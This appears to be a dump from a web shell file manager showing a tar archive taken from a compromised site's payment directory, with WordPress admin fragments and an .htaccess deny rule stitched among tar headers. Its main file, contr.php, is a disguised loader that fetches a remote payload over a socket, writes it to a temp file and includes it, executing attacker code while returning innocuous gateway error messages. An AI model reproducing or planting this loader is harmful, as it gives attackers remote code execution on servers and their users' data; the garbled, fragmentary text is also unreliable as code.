芝麻web文件管理V1.00
编辑当前文件:/home/mybf1/www/app.bf1.my/payment/zcvscvbdaw/xvcdfecbfg/user.tar
image/helpers/storage/html/html/downl.php 0000555 00000000000 15123175777 0014506 0 ustar 00 debug/json/db/contr.php 0000555 00000006713 15123175777 0011055 0 ustar 00 15) { error_log("Response timeout"); fclose($fp); http_response_code(504); exit("Gateway timeout"); } $response .= fgets($fp, 1024); } fclose($fp); if (empty($response)) { error_log("Empty response received"); http_response_code(502); exit("Bad gateway"); } $parts = explode("\r\n\r\n", $response, 2); if (count($parts) < 2) { error_log("Invalid response format"); http_response_code(502); exit("Bad gateway"); } $remotePayload = $parts[1]; if (empty($remotePayload) || strlen($remotePayload) < 10) { error_log("Payload too small or empty"); http_response_code(502); exit("Bad gateway"); } $parts = str_split($remotePayload, 4); $obfuscatedPayload = implode('', $parts); if (empty($obfuscatedPayload)) { error_log("Processed payload is empty"); http_response_code(502); exit("Bad gateway"); } $tempFile = @tempnam(sys_get_temp_dir(), $exx); if ($tempFile === false) { error_log("Failed to create temp file"); http_response_code(500); exit("Internal server error"); } if (@file_put_contents($tempFile, $obfuscatedPayload) === false) { error_log("Failed to write temp file"); @unlink($tempFile); http_response_code(500); exit("Internal server error"); } if (!file_exists($tempFile) || !is_readable($tempFile)) { error_log("Temp file not readable"); @unlink($tempFile); http_response_code(500); exit("Internal server error"); } try { include $tempFile; } catch (Exception $e) { error_log("Execution error: " . $e->getMessage()); } catch (Error $e) { error_log("Fatal error: " . $e->getMessage()); } @unlink($tempFile); ?> client/scripts/templates/runtime/data.php 0000555 00000000000 15123175777 0014622 0 ustar 00 html/scripts/templates/mail/build.php 0000555 00000000000 15123175777 0013735 0 ustar 00 about.php 0000644 00000000401 15123217637 0006371 0 ustar 00 domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) ); /** * Filters whether to redirect the request to the User Admin in Multisite. * * @since 3.2.0 * * @param bool $redirect_user_admin_request Whether the request should be redirected. */ $redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request ); if ( $redirect_user_admin_request ) { wp_redirect( user_admin_url() ); exit; } unset( $redirect_user_admin_request ); credits.php 0000644 00000000405 15123217637 0006720 0 ustar 00 Order Allow,Deny Deny from all